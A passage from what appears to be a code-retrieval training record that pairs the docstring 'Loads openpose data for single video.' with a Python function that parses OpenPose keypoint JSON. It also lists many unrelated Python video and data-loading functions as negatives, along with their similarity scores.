in Train fdhh = {np.sum(X_train.values == 0) / X_train.size}')\n\t\t\t\t\tprint(f'Sparsity in Test fdhh = {np.sum(X_test.values == 0) / X_test.size}')\n\t\t\telse:\n\t\t\t\tX_train, X_test = self.video_pca(X_train, X_test)\n\t\t\t\t\n\t\tif self.options.save_features:\n\t\t\tsave_to_file(feature_path[0], feature_path[1], (X_train, X_test))\n\t\t\tself.options.save_features = False\n\t\t\n\t\tif not self.fdhh:\n\t\t\tX_train = self.split_videos(X_train)\n\t\t\tX_test = self.split_videos(X_test)\n\t\t\t\n\t\treturn [X_train, X_test]", "def load_data(self):\n overlength_num = title_num = 0\n with open(self.path, 'r', encoding='utf-8') as r:\n for line in r:\n inst = json.loads(line)\n is_title = inst['sent_id'].endswith('-3') and inst['tokens'][-1] != '.'\n if self.ignore_title and is_title:\n title_num += 1\n continue\n\n # TODO: add back coarse type\n for event in inst['event_mentions']:\n event_type = event['event_type']\n if ':' in event_type:\n event['event_type'] = event_type.split(':')[1].upper()\n self.data.append(inst)\n\n if title_num:\n print('Discarded {} titles'.format(title_num))\n print('Loaded {} instances from {}'.format(len(self), self.path))", "def crosslyGenerateFrames(self):\n fail = set()\n try:\n while self.alive:\n for name, video in self._videos.items():\n video: cv2.VideoCapture\n success, frame = video.read()\n if self.longFirst:\n if len(fail) == len(self._videos): # 长视频优先,视频长度由最长决定\n return\n elif not success:\n print(f'Read {name} Over')\n fail.add(video)\n else:\n yield frame\n else:\n if success: # 短视频优先,视频长度由最短决定\n yield frame\n else:\n return\n print('Reading Completed!')\n except Exception as e:\n raise e\n finally:\n self.close()", "def WLASL_parcours():\n path = \"/home/nmiguens/Datasets/WLASL\"\n write_txt(\"\\n\" + \"---------------------------- \\n\" + \"Nouveau processus \\n\")\n nb_video = 0\n with open(r\"{}\".format(path + \"/start_kit/WLASL_v0.3.json\"), \"r\") as read_file:\n WLASL = json.load(read_file)\n for glosses in WLASL:\n for instance in glosses[\"instances\"]:\n inputVideo = os.path.join(path, \"videos/\" + instance[\"video_id\"] +\".mp4\")\n if os.path.exists(inputVideo):\n if not os.path.exists(\"/home/nmiguens/JSON/WLASL/{}_{}.json\".format(glosses[\"gloss\"], instance[\"instance_id\"])):\n videoDict = video_to_dict(inputVideo, 0, -1) #instance[\"frame_start\"], instance[\"frame_end\"])\n dict_to_json(videoDict, glosses[\"gloss\"], instance[\"instance_id\"])\n nb_video = len(os.listdir(\"/home/nmiguens/JSON/WLASL\")) - nb_video \n message = \"{} vidéos traitées pour la classe {}\".format(nb_video, glosses[\"gloss\"])\n write_txt(message)\n return 0", "def getvideolist():\n safeprint(\"Getting video list...\")\n response = getfile(\"http://openings.moe/api/list.php\")\n lstjson = response.read().decode(\"utf-8\", \"ignore\")\n videolist = json.loads(lstjson)\n return videolist", "def loadData(path,filename):\n\tfilepath = path + filename\n\ttry:\n\t\t#print('try1')\n\t\twith open(filepath+\".pickle\",\"rb\") as handle:\n\t\t\tallVideoData = pickle.load(handle)\n\t\ttry:\n\t\t\tmetadata = allVideoData[0]\n\t\t\tdata = allVideoData[1]\n\t\texcept:\n\t\t\tmetadata = allVideoData\n\t\t\tdata = __initializeData()\n\t\t\tprint(\"WARNING\")\n\t\t\tprint(\"warning: no data attached to metadata, initializing empty set\")\n\t\t\ttime.sleep(1)\n\t\treturn metadata,data\n\texcept:\n\t\tprint('no file {} exists yet'.format(filepath+\".pickle\"))\n\t\tprint('if writeMetadata has already been used, be sure to save it with 
saveData()')\n\t\ttime.sleep(1)\n\t\tmetadata = False\n\t\treturn metadata,__initializeData()", "def get_data(self):\n global CAM\n while CAM.isOpened():\n _, frame = CAM.read()\n _, jpeg = cv2.imencode('.jpg', frame)\n encoded_img = \"data:image/jpg;base64,\" + str(base64.b64encode(jpeg.tobytes()).decode())\n SIO.emit('video_frame',\n {'frame': encoded_img},\n namespace='/live-stream')\n sleep(self.delay)", "def video_optimization(dataset: LiveCapAdapter, energy: Energy, initial_pose: ndarray,\n n_frames=-1, verbose=True) -> ndarray:\n if n_frames <= 0:\n n_frames = len(dataset)\n if verbose:\n print(f'running video_optimization for {n_frames} frames...')\n\n pose_list = []\n pose = initial_pose\n\n for i in range(n_frames):\n if verbose:\n print(f'estimating pose in frame {i} out of {n_frames}...')\n\n entry = dataset[i]\n pose = frame_optimization(entry, pose, energy)\n pose_list.append(pose)\n\n if verbose:\n print('finished video optimization.')\n\n return np.array(pose_list)", "def load(self):\n Logger.info(\"VLCPlayer: Entering load\")\n self._load_player(self.source)\n self._set_volume(self.volume)", "def DataLoader(data_place):\n # Nd = []\n # Np = []\n # Nz = []\n # channel_num = []\n # images = []\n # id_labels = []\n # pose_labels = []\n\n # mycase\n # Nz = 50\n # channel_num = 3\n # images = np.load('{}/images.npy'.format(data_place))\n # id_labels = np.load('{}/ids.npy'.format(data_place))\n # pose_labels = np.load('{}/yaws.npy'.format(data_place))\n #\n # Np = int(pose_labels.max() + 1)\n # Nd = int(id_labels.max() + 1)\n #\n # return [images, id_labels, pose_labels, Nd, Np, Nz, channel_num]\n\n # mycase MultiPIE\n Nz = 50\n channel_num = 3\n image_attributes_df = pd.read_csv(data_place)\n\n Nd = int(np.max(image_attributes_df['Id'])+1)\n Np = int(np.max(image_attributes_df['pose'])+1)\n Ni = int(np.max(image_attributes_df['illum'])+1)\n\n return [image_attributes_df, Nd, Np, Ni, Nz, channel_num]", "def load_vox(data: pd.DataFrame, in_place: bool = False):\n if not in_place:\n mod = data.copy()\n else:\n mod = data\n clips = []\n channels = []\n samplerates = []\n durations = []\n for i, row in mod.iterrows():\n sys.stdout.write(f\"\\r[-] Reading: {i} of {len(mod)} ({i / len(mod) * 100: .2f}%)\")\n sys.stdout.flush()\n with audioread.audio_open(row['file']) as f:\n channels.append(f.channels)\n samplerates.append(f.samplerate)\n durations.append(f.duration)\n data = bytearray()\n for buf in f:\n data = data + buf\n clips.append(data)\n sys.stdout.write(f\"\\r[ ] Read {len(mod)} files into DataFrame.\\r\\n\")\n sys.stdout.flush()\n mod['audio'] = pd.Series(clips)\n mod['channels'] = pd.Series(channels)\n mod['samplerate'] = pd.Series(samplerates)\n mod['duration'] = pd.Series(durations)\n return mod", "def get_frame_list(self):\r\n\r\n logger.debug('Executing frame extraction')\r\n\r\n frames_loaded = False\r\n\r\n # Try to load YAML file with frame list\r\n if os.path.exists(self.frames_file_path):\r\n\r\n print 'Loading YAML file with frame list'\r\n logger.debug('Loading YAML file with frame list')\r\n\r\n f_list = utils.load_YAML_file(self.frames_file_path)\r\n\r\n if f_list:\r\n self.frame_list = f_list\r\n\r\n print 'YAML file with frame_list loaded'\r\n logger.debug('YAML file with frame_list loaded')\r\n\r\n frames_loaded = True\r\n\r\n if not frames_loaded:\r\n\r\n print '\\n\\n### Frame extraction ###\\n'\r\n logger.debug('\\n\\n### Frame extraction ###\\n')\r\n\r\n # Save processing time\r\n start_time = cv2.getTickCount()\r\n\r\n if not 
(os.path.exists(self.frames_path)):\r\n os.makedirs(self.frames_path)\r\n\r\n # Counter for all frames\r\n frame_counter = 0\r\n\r\n # Value of frame_counter for last analyzed frame\r\n last_anal_frame = 0\r\n\r\n # Open video file\r\n capture = cv2.VideoCapture(self.resource_path)\r\n\r\n self.frame_list = []\r\n\r\n # Save parameters for this video\r\n param_dict = {}\r\n\r\n if capture is None or not capture.isOpened():\r\n\r\n error = 'Error in opening video file'\r\n\r\n print error\r\n logger.debug(error)\r\n\r\n return\r\n\r\n else:\r\n\r\n video_fps = capture.get(cv2.cv.CV_CAP_PROP_FPS)\r\n\r\n param_dict[c.VIDEO_FPS_KEY] = video_fps\r\n\r\n # Original number of frames\r\n tot_frames = capture.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT)\r\n\r\n param_dict[c.VIDEO_TOT_FRAMES_KEY] = tot_frames\r\n\r\n self.fps = video_fps\r\n\r\n self.video_frames = float(tot_frames)\r\n\r\n # Saved frames\r\n saved_frames = 0\r\n\r\n while True:\r\n\r\n # Read frame\r\n ret, frame = capture.read()\r\n\r\n # If no frame is read, abort\r\n if not ret:\r\n break\r\n\r\n used_fps = c.USED_FPS\r\n use_or_fps = c.USE_ORIGINAL_FPS\r\n use_or_res = c.USE_ORIGINAL_RES\r\n used_res_scale_factor = c.USED_RES_SCALE_FACTOR\r\n\r\n if self.params is not None:\r\n\r\n if c.USED_FPS_KEY in self.params:\r\n used_fps = self.params[c.USED_FPS_KEY]\r\n\r\n if c.USE_ORIGINAL_FPS_KEY in self.params:\r\n use_or_fps = self.params[c.USE_ORIGINAL_FPS_KEY]\r\n\r\n if c.USE_ORIGINAL_RES_KEY in self.params:\r\n use_or_res = self.params[c.USE_ORIGINAL_RES_KEY]\r\n\r\n if c.USED_RES_SCALE_FACTOR_KEY in self.params:\r\n used_res_scale_factor = self.params[\r\n c.USED_RES_SCALE_FACTOR_KEY]\r\n\r\n # Next frame to be analyzed\r\n next_frame = last_anal_frame + (video_fps / used_fps) - 1\r\n\r\n if use_or_fps or (frame_counter > next_frame):\r\n\r\n # Frame position in video in milliseconds\r\n elapsed_ms = capture.get(cv2.cv.CV_CAP_PROP_POS_MSEC)\r\n\r\n # print 'elapsed video s =', elapsed_video_s\r\n\r\n fr_name = '%07d.png' % frame_counter\r\n\r\n frame_path = os.path.join(self.frames_path, fr_name)\r\n\r\n # Resize frame\r\n if not use_or_res:\r\n fx = used_res_scale_factor\r\n\r\n fy = used_res_scale_factor\r\n\r\n interp = cv2.INTER_AREA\r\n\r\n frame = cv2.resize(src=frame, dsize=(0, 0),\r\n fx=fx, fy=fy,\r\n interpolation=interp)\r\n\r\n cv2.imwrite(frame_path, frame,\r\n [cv.CV_IMWRITE_PNG_COMPRESSION, 0])\r\n\r\n frame_dict = {c.SAVED_FRAME_NAME_KEY: fr_name,\r\n c.ELAPSED_VIDEO_TIME_KEY: int(elapsed_ms)}\r\n\r\n self.frame_list.append(frame_dict)\r\n\r\n last_anal_frame = frame_counter\r\n\r\n saved_frames += 1\r\n\r\n frame_counter += 1\r\n\r\n self.progress = 100 * (frame_counter / self.video_frames)\r\n\r\n print('progress: ' + str(self.progress) + ' % \\r'),\r\n\r\n del capture\r\n\r\n self.saved_frames = float(saved_frames)\r\n\r\n param_dict[c.VIDEO_SAVED_FRAMES_KEY] = self.saved_frames\r\n\r\n # Save frame list in YAML file\r\n utils.save_YAML_file(self.frames_file_path, self.frame_list)\r\n\r\n # Save video parameters in YAML file\r\n\r\n utils.save_YAML_file(self.params_file_path, param_dict)\r\n\r\n # Save processing time\r\n time_in_clocks = cv2.getTickCount() - start_time\r\n time_in_seconds = time_in_clocks / cv2.getTickFrequency()\r\n\r\n print 'Time for frame extraction:', str(time_in_seconds), 's\\n'\r\n logger.debug(\r\n 'Time for frame extraction:', str(time_in_seconds), 's\\n')\r\n\r\n self.anal_times[c.FRAME_EXTRACTION_TIME_KEY] = time_in_seconds\r\n\r\n utils.save_YAML_file(self.analysis_file_path, 
self.anal_times)", "def get_videos(self):\n return list(self._videos.values())", "def _load_data(self):\n\n if not self._cache.exists(config.DATAFRAME_SONG_DATA):\n source_path = os.path.join(config.S3_SONG_DATA, 'A/A/A/*.json') # Note: song database is way big, so we get only a slice of it.\n dataframe = self._get_spark_session().read.json(source_path)\n self._cache.set_source(config.DATAFRAME_SONG_DATA, dataframe)", "def load_top_video(self):\n\n if self.general_parser is None or \\\n self.specific_parser is None or \\\n ((self.video_parser is None) and (self.video_data_parser is None)):\n self.missing_files_label.grid(row=13, column=5)\n raise Exception(\"you need to load the general, month-specific, and video words first\")\n else:\n self.missing_files_label.grid_remove()\n\n if self.month_selected is None:\n self.no_month_selected_label.grid(row=14, column=5, columnspan=1)\n else:\n self.no_month_selected_label.grid_remove()\n\n self.top_unique_video = self.find_top_unique(self.video_entries,\n int(self.top_unique_video_entry.get()))\n\n self.top_unique_video_box.delete(0, END)\n\n box_count = 0\n for rank, words in enumerate(self.top_unique_video):\n for index, word in enumerate(words):\n self.top_unique_video_box.insert(box_count,\n str(word.rank)+ \". \" +\n word.word +\n \" - \" + str(word.count))\n box_count += 1\n\n self.unique_video_found = True", "def imdb_load():\n for root, dirs, filenames in os.walk(os.path.dirname(__file__) + \"/imdb\"):\n for file_name in filenames:\n if file_name.find(\".json\") > 0:\n Movie.imdb_load_file(os.path.dirname(__file__) + \"/imdb/\" + file_name)\n return Movie.__movies", "def load_data(self):\n if self.debug:\n print(\"Loading data\")", "def ordinarilyGenerateFrames(self):\n for name, video in self._videos.items():\n print(f'Reading:{name}...')\n success, frame = video.read()\n while self.alive and success:\n yield frame\n success, frame = video.read()\n print('Reading Completed!')\n self._videos.clear()", "def load_vets():\n\n print(\"Vets\")\n\n Vet.query.delete()\n\n with open(\"seed_data/vet_seed.psv\") as vets:\n for row in vets:\n user_id, grad_year, specialty = row.strip().split(\"|\")\n\n vet = Vet(\n user_id = user_id,\n grad_year = datetime.datetime.strptime(grad_year, \"%d-%b-%Y\"),\n specialty = specialty\n )\n\n db.session.add(vet)\n\n db.session.commit()", "def load_data(self):\n if os.path.isfile(_POSPKL):\n with open(_POSPKL, 'rb') as fpkl:\n dat = pickle.load(fpkl)\n for name, obj in self.toplevel_wins.iteritems():\n if dat.get(name, None):\n obj.set_position(*dat[name])", "def video_files():\n p = parse_cmdline(get_parser=get_parser_files)\n log.setup_main_handler(\n mods=(\"fogtools\", \"typhon\", \"fogpy\", \"sattools\", \"fcitools\", \"satpy\",\n \"pyresample\"),\n level=logging.INFO)\n vis.show_video_abi_glm(\n files=p.files,\n img_out=p.filename_pattern_image,\n vid_out=p.filename_pattern_video,\n out_dir=p.outdir)\n print(\"Files written to:\", p.outdir)", "def data_video_dictionary(train_names):\n length=0 # to check the length of total dataset\n dict_videos= {}\n for name in train_names: \n dict_images={} \n for i in range(len(os.listdir(\"../dataset/data/\"+name))): \n dict_images[str(i)]= cv.imread(\"../dataset/data/\"+name+\"/frame00\"+\"{:02d}\".format(i)+\".png\",cv.IMREAD_GRAYSCALE)\n \n length=length+len(dict_images)\n dict_videos[name]=dict_images\n #what I am doing here is error checking, can do this professionally also..do it after experiments..\n print(\"Length of total dataset, should be 21100 :\"+ 
str(length)) \n return dict_videos", "def get_video(soup, data, dictionary):\n video_markup = [] \n VIDEOS_TAGS = ['iframe', 'embed', 'object', 'video']\n VIDEO_PROVIDERS = ['youtube', 'vimeo', 'dailymotion', 'kewego']\n #print \",\".join(VIDEOS_TAGS)\n for t in VIDEOS_TAGS:\n if soup.find_all(t):\n for vid in soup.find_all(t):\n # youtube og vimeo kan avsløres ver src atributt til iframe tag\n #print vid\n for prov in VIDEO_PROVIDERS:\n if prov in vid['src']:\n video_markup.append(vid)\n\n #print video_markup \n #print \"antall videoer (ikke nrk): \", len(video_markup)\n\n # nrk-videoer (lastet via js, og må trikses med)\n # ser ut som eksistensen av en data-video-id=\"118648\" kan være en bedre indikator.. \n nrk_videoer = soup.select('figure.video')\n #print \"antall nrk-videoer: \", len(nrk_videoer)\n\n\n dictionary['video_files'] = len(video_markup)\n dictionary['video_files_nrk'] = len(nrk_videoer)\n return", "def _load_processed_data(self):\n with open(os.path.join(self._data_root_path, self._processed_train_data_file_name),\n 'r') as f:\n train_examples = json.load(f)\n\n with open(os.path.join(self._data_root_path, self._processed_dev_data_file_name), 'r') as f:\n dev_examples = json.load(f)\n\n with open(os.path.join(self._data_root_path, self._word_vocab_file_name), 'r') as f:\n word_vocab = Vocab.from_json(json.load(f))\n\n with open(os.path.join(self._data_root_path, self._char_vocab_file_name), 'r') as f:\n char_vocab = Vocab.from_json(json.load(f))\n\n return train_examples, dev_examples, word_vocab, char_vocab", "def load(self):\n\n\t\t# Check if dataset location exists\n\t\tif (not os.path.exists(self._location)):\n\t\t\tprint(\"Error: Dataset location does not exist\")\n\t\t\treturn\n\n\t\tself._frames = sorted(glob.glob(self._location + '/frame*.jpg'))\n\n\t\t# Check if startFrame is beyond dataset bounds\n\t\tif (self._startFrame > len(self._frames)):\n\t\t\tprint(\"Error: Start frame is beyond dataset bounds\")\n\t\t\treturn\n\n\t\t# Check if endFrame is beyond dataset bounds\n\t\tif (self._endFrame > len(self._frames)):\n\t\t\tprint(\"Warning: End frame beyond dataset bounds, setting to end of dataset\")\n\n\t\t# Start buffering threads\n\t\tself._bufferThreadStopped = False\n\t\tself._bufferingThread.start()", "def _load_data(self):\n self.mapper = Mapper()\n self.mapper.generate_vocabulary(self.review_summary_file)\n self.X_fwd, self.X_bwd, self.Y = self.mapper.get_tensor(reverseflag=True)\n # Store all the mapper values in a dict for later recovery\n self.mapper_dict = dict()\n self.mapper_dict['seq_length'] = self.mapper.get_seq_length()\n self.mapper_dict['vocab_size'] = self.mapper.get_vocabulary_size()\n self.mapper_dict['rev_map'] = self.mapper.get_reverse_map()\n # Split into test and train data\n self._split_train_tst()", "def get_videos_in_playlist(self):\n\n self.ydl = youtube_dl.YoutubeDL()\n # uses the youtube_dl as a context manager\n with self.ydl:\n self.result = self.ydl.extract_info(\n self.url, extra_info={'listformats': True}, download=False)\n for video in (self. result['entries']):\n video_id = video['id']\n self. url = f'https://www.youtube.com/watch?v={video_id}'\n self. 
show_formats()", "def load(cls):\n playerdata = Data.raw_load(\"savedata.dat\")\n for key in playerdata:\n cls.name = playerdata[\"name\"]\n cls.max_hp = playerdata[\"max_hp\"]\n cls.hp = playerdata[\"hp\"]\n cls.lv = playerdata[\"lv\"]\n cls.exp = playerdata[\"exp\"]\n cls.atk = playerdata[\"atk\"]\n cls._def = playerdata[\"_def\"]\n cls.inventory = playerdata[\"inventory\"]\n cls.pin = playerdata[\"pin\"]", "def run_all(movie_name):\n s = time.time()\n panorama_generator = sol4.PanoramicVideoGenerator('dump/%s/' % movie_name, movie_name, 2100)\n panorama_generator.align_images(translation_only=False)\n panorama_generator.generate_panoramic_images(9)\n print(' time for %s: %.1f' % (movie_name, time.time() - s))\n panorama_generator.save_panoramas_to_video()", "def load_data(self):\n\n self._load_train_data()\n self._load_test_data()", "def initialize_vids(CONFIG_PARAMS, datadict, e, vids, pathonly=True):\n for i in range(len(CONFIG_PARAMS[\"experiment\"][e][\"camnames\"])):\n # Rather than opening all vids, only open what is needed based on the\n # maximum frame ID for this experiment and Camera\n flist = []\n for key in datadict.keys():\n if int(key.split(\"_\")[0]) == e:\n flist.append(\n datadict[key][\"frames\"][\n CONFIG_PARAMS[\"experiment\"][e][\"camnames\"][i]\n ]\n )\n\n flist = max(flist)\n\n # For COM prediction, we don't prepend experiment IDs\n # So detect this case and act accordingly.\n basecam = CONFIG_PARAMS[\"experiment\"][e][\"camnames\"][i]\n if \"_\" in basecam:\n basecam = basecam.split(\"_\")[1]\n\n if CONFIG_PARAMS[\"vid_dir_flag\"]:\n addl = \"\"\n else:\n addl = os.listdir(\n os.path.join(CONFIG_PARAMS[\"experiment\"][e][\"viddir\"], basecam,)\n )[0]\n r = generate_readers(\n CONFIG_PARAMS[\"experiment\"][e][\"viddir\"],\n os.path.join(basecam, addl),\n maxopt=flist, # Large enough to encompass all videos in directory.\n extension=CONFIG_PARAMS[\"experiment\"][e][\"extension\"],\n pathonly=pathonly,\n )\n\n if \"_\" in CONFIG_PARAMS[\"experiment\"][e][\"camnames\"][i]:\n vids[CONFIG_PARAMS[\"experiment\"][e][\"camnames\"][i]] = {}\n for key in r:\n vids[CONFIG_PARAMS[\"experiment\"][e][\"camnames\"][i]][\n str(e) + \"_\" + key\n ] = r[key]\n else:\n vids[CONFIG_PARAMS[\"experiment\"][e][\"camnames\"][i]] = r\n\n return vids", "def load_openml_data():\n datasets = dict()\n files = os.listdir(_DATA_DIRECTORY.value)\n for file_name in files:\n with open(_DATA_DIRECTORY.value + file_name, \"r\") as ff:\n task = np.loadtxt(ff, delimiter=\",\", skiprows=1)\n np.random.shuffle(task)\n datasets[file_name] = [task]\n return datasets, files", "def print_data():\r\n print(\"\\n\\n*** Loaded data:\")\r\n if \"defaultdirectory\" in data:\r\n print(\"*** Default video source directory:\", data[\"defaultdirectory\"])\r\n for key in sorted(data):\r\n if key != \"defaultdirectory\":\r\n print(\"{} --> {}\".format(key, data[key]))", "def load_movies():\n print \"Movies\"\n\n # Delete all rows in table, so if we need to run this a second time,\n # we won't be trying to add duplicate users\n Movie.query.delete()\n\n # Read u.item file and insert data\n for row in open(\"seed_data/u.item\"):\n row =row.rstrip()\n\n movie_id, title_long, released_string, imdb_url = row.split(\"|\")[:4]\n #we modified the datetime format changed released_string into \n #new format by using datetim.strptime to convert it. 
\n print row\n if released_string: \n release_at = datetime.strptime(released_string, \"%d-%b-%Y\")\n else: \n release_at = None \n\n #here we stripped the title of the (xxxx) year and parenthesis\n #using the slice method. \n title = title_long[:-7]\n\n print movie_id, title_long, released_string, imdb_url\n\n #assign the return values from our for loop to a new variable\n movie = Movie(movie_id=movie_id, title=title, released_at=release_at,\n imdb_url=imdb_url)\n \n # We need to add to the session or it won't ever be stored\n db.session.add(movie)\n\n #Once we're done, we should commit our work\n db.session.commit()", "def load_parameters(self, session, data_dict):\n for layer in self.layers:\n layer.load_parameters(session, data_dict)" ]
[ "0.7148177", "0.6771924", "0.6767525", "0.6552482", "0.6189131", "0.61795473", "0.61142415", "0.6013824", "0.5968695", "0.5942266", "0.5874326", "0.58726317", "0.5843663", "0.5814855", "0.5791894", "0.5758234", "0.57317847", "0.5715237", "0.57054555", "0.57054555", "0.5681245", "0.56790996", "0.5656687", "0.56404597", "0.56380755", "0.5630887", "0.5630127", "0.5618003", "0.56134325", "0.56090385", "0.5595797", "0.55924666", "0.5582189", "0.556542", "0.5554816", "0.55530727", "0.5475096", "0.5438108", "0.54274356", "0.5420369", "0.54123324", "0.53880584", "0.5386119", "0.5377482", "0.53632677", "0.5331168", "0.5318671", "0.53113735", "0.5287092", "0.5280745", "0.526982", "0.5255968", "0.52535266", "0.52479845", "0.5245657", "0.52354854", "0.52282053", "0.5223881", "0.51991004", "0.51908034", "0.518102", "0.518102", "0.51518303", "0.5150591", "0.5149898", "0.5138407", "0.51322806", "0.5132151", "0.51266533", "0.51169014", "0.51164836", "0.5115762", "0.511331", "0.511026", "0.5092588", "0.5086553", "0.5085624", "0.5081877", "0.50796497", "0.5073729", "0.50706434", "0.50591016", "0.5052296", "0.5045267", "0.50420797", "0.50397205", "0.50306207", "0.50252134", "0.5024246", "0.5023197", "0.5020013", "0.50156975", "0.50150526", "0.50131774", "0.50086355", "0.50020933", "0.4999122", "0.49849138", "0.49844182", "0.49826887" ]
0.6053022
7
Loads openpose data for single video.
def load_op_data(path_to_json, vm, person_metric="largest_bbox"):
    frame_list = []
    keypoint_files = [os.path.join(path_to_json, pos_json) for pos_json in os.listdir(path_to_json) if pos_json.endswith('.json')]
    for js in keypoint_files:
        with open(js) as json_file:
            keypoint_data = json.load(json_file)
            # preprocess keypoint data per person detected (list of all coords --> dict of parts to coords)
            max_bbox_sz = 0 #TODO (see below todo)
            selected_part_data = {}
            for person_id in range(len(keypoint_data['people'])):
                pose_keypoints_2d = keypoint_data['people'][person_id]['pose_keypoints_2d']
                part_data = {}
                for index in INDEX_TO_PART:# transform keypoint unstructured list into dictionary of parts
                    keypoint_index = index * POINTS_PER_PART
                    part_data[index] = pose_keypoints_2d[keypoint_index : keypoint_index + POINTS_PER_PART]
                    if len(part_data[index]) != 0: #normalize
                        part_data[index][0] /= vm.width
                        part_data[index][1] /= vm.height
                    else:
                        part_data[index] = [0, 0, 0]
                # select person w/ largest bbox
                # TODO: change to more generalized metric if needed; just change this snippet plus max_bbox_sz declaration above
                if person_metric == "largest_bbox":
                    curr_bbox_sz = get_bbox_size(part_data)
                elif person_metric == "rightmost_bbox":
                    curr_bbox_sz = get_bbox_maxpt(part_data)
                if curr_bbox_sz > max_bbox_sz:
                    max_bbox_sz = curr_bbox_sz
                    selected_part_data = part_data
            if len(keypoint_data['people']) == 0:
                # no people detected in this frame, set all values in frame to zero
                selected_part_data = {part_index: [0, 0, 0] for part_index in range(len(INDEX_TO_PART)) }
            frame_list.append(selected_part_data)
    return frame_list
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _loadData(self, data):\n Movie._loadData(self, data)\n PlexSession._loadData(self, data)", "def __loadVideo(self):\n # Check if movie file exists ...\n #\n if not(os.path.isfile(self.fNameVideo)):\n return stm.StimErrC.videoFileNotFound\n\n try: \n # Load video\n #\n self.video = mpe.VideoFileClip(self.fNameVideo)\n \n except IOError: \n return stm.StimErrC.invalidVideoFormat\n \n # Retrieve video description\n #\n self.dxFr = self.video.size[0]\n self.dyFr = self.video.size[1]\n self.nFr = self.video.duration *self.video.fps\n self.fps = self.video.fps\n ssp.Log.write(\"DEBUG\", \"stim_video: {0}x{1} pixel, {2} frames, {3} fps\"\n .format(self.dxFr, self.dyFr, self.nFr, self.fps))\n \n if self.isTestOnly:\n # Return here if the video was only loaded to test if it is ok\n #\n self.video = None\n return stm.StimErrC.ok\n \n # Load movie frames (note that frames is a generator!)\n #\n self.frames = self.video.iter_frames() \n self.isReady = True\n return stm.StimErrC.ok", "def load_pycon_data(pycon_videos=pycon_videos):\r\n with open(pycon_videos, 'rb') as fd:\r\n return pickle.load(fd)", "def load_pycon_data(pycon_videos: str):\n p_data = None\n with open(pycon_videos, 'rb') as pickle_file:\n p_data = pickle.load(pickle_file)\n return p_data", "def load_video(self):\r\n if self.file_name=='':\r\n Tk().withdraw()\r\n self.file_name = askopenfilename()\r\n cap = cv2.VideoCapture(self.file_name)\r\n self.length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\r\n self.width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n self.heigth = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n self.fps = int(round(cap.get(cv2.CAP_PROP_FPS)))\r\n \r\n video_buffer = []#np.ndarray(shape=(self.length, self.heigth, self.width, 3), dtype=np.uint8)\r\n for i in tqdm(range(self.length), desc='Loading video from: {}'.format(self.file_name)):\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n video_buffer.append(frame)\r\n #assert(i==self.length-1)\r\n video_buffer = np.array(video_buffer, dtype=np.uint8)\r\n self.video_buffer = video_buffer\r\n cap.release()\r\n self.ix = self.width-1\r\n self.iy = self.heigth-1 \r\n self.roi = dict(x1=self.x, y1=self.y, x2=self.ix, y2=self.iy)\r\n return video_buffer", "def _load_video(self, video):\n\t\timport cv2\n\t\tcap = cv2.VideoCapture(video)\n\t\tassert cap.get(cv2.CAP_PROP_FRAME_WIDTH) >= 100, 'width must be at least 100 pixels'\n\t\tassert cap.get(cv2.CAP_PROP_FRAME_HEIGHT) >= 100, 'height must be at least 100 pixels'\n\t\tn = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\t\tbuf = np.empty((n, int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)), int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)), 3), np.dtype('uint8'))\n\t\ti, ret = 0, True\n\t\twhile (i < n and ret):\n\t\t\tret, frame = cap.read()\n\t\t\tframe = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\t\t\tbuf[i] = frame\n\t\t\ti += 1\n\t\tcap.release()\n\t\treturn np.moveaxis(buf, -1, 1)", "def load_video_data(self):\n self.file_videos = [\n Video.from_file(path, self)\n for path in self.video_dir.glob('*.json')\n ]", "def loadData(catalog):\n loadVideos(catalog)", "def _loadData(self, data):\n Episode._loadData(self, data)\n PlexSession._loadData(self, data)", "def onclick_load_video(self):\n video_source = select_file(\n \"Select Video Files\",\n \"../\",\n \"Video Files (*.mp4 *.avi *.mpg *.gif *.mov)\")\n if video_source:\n param_name = select_file(\n \"Select Parameter\", \"../\", \"Parameter Files (*.json)\")\n if param_name:\n self.moildev = Moildev(param_name)\n self.running_video(video_source)", "def _loadData(self, data):\n 
Video._loadData(self, data)\n Playable._loadData(self, data)\n self._data = data\n self.addedAt = utils.toDatetime(data.attrib.get('addedAt'))\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.extraType = utils.cast(int, data.attrib.get('extraType'))\n self.index = utils.cast(int, data.attrib.get('index'))\n self.media = self.findItems(data, media.Media)\n self.originallyAvailableAt = utils.toDatetime(\n data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.skipDetails = utils.cast(int, data.attrib.get('skipDetails'))\n self.subtype = data.attrib.get('subtype')\n self.thumbAspectRatio = data.attrib.get('thumbAspectRatio')\n self.viewOffset = utils.cast(int, data.attrib.get('viewOffset', 0))\n self.year = utils.cast(int, data.attrib.get('year'))", "def load_videos(self):\n logging.debug(\"Loading videos data...\")\n\n # loading videos\n data=requests.get(self.__URL_VIDEOS)\n self.__dataframe_videos=pd.DataFrame(data.json())\n # XXX transposing as the API returns a pre index list of videos\n self.__dataframe_videos = self.__dataframe_videos.transpose()\n if self.__save_raw_data_to_csv:\n logging.debug(\"Saving raw data to CSV [%s...\" % self.__RAW_DATA_FILENAME)\n self.__dataframe_videos.to_csv(self.__RAW_DATA_FILENAME, encoding='utf-8', sep=',', index=False)\n self.__dataframe_videos['video_contents'] = self.__dataframe_videos[['video_title', 'video_desc']].\\\n apply(lambda x: \" \".join(x), axis=1)\n\n logging.debug(\"Informative videos data loaded! n=%s\" % self.__dataframe_videos.shape[0])\n\n return self.__dataframe_videos", "def load_video(self, vid_path):\n self.video = cv2.VideoCapture(vid_path)\n self._check_vid_open()\n logging.info('Loaded video at: {}'.format(vid_path))\n return 1", "def _load_data(self, cfg):\n # Load frame trajectories\n if self.cfg.MODEL.USE_TRAJECTORIES:\n if cfg.VIDOR.TEST_DEBUG:\n print('Loading trajectories...')\n with open(os.path.join(cfg.VIDOR.ANNOTATION_DIR, self.trajectories_path), 'r') as f:\n self._trajectories = 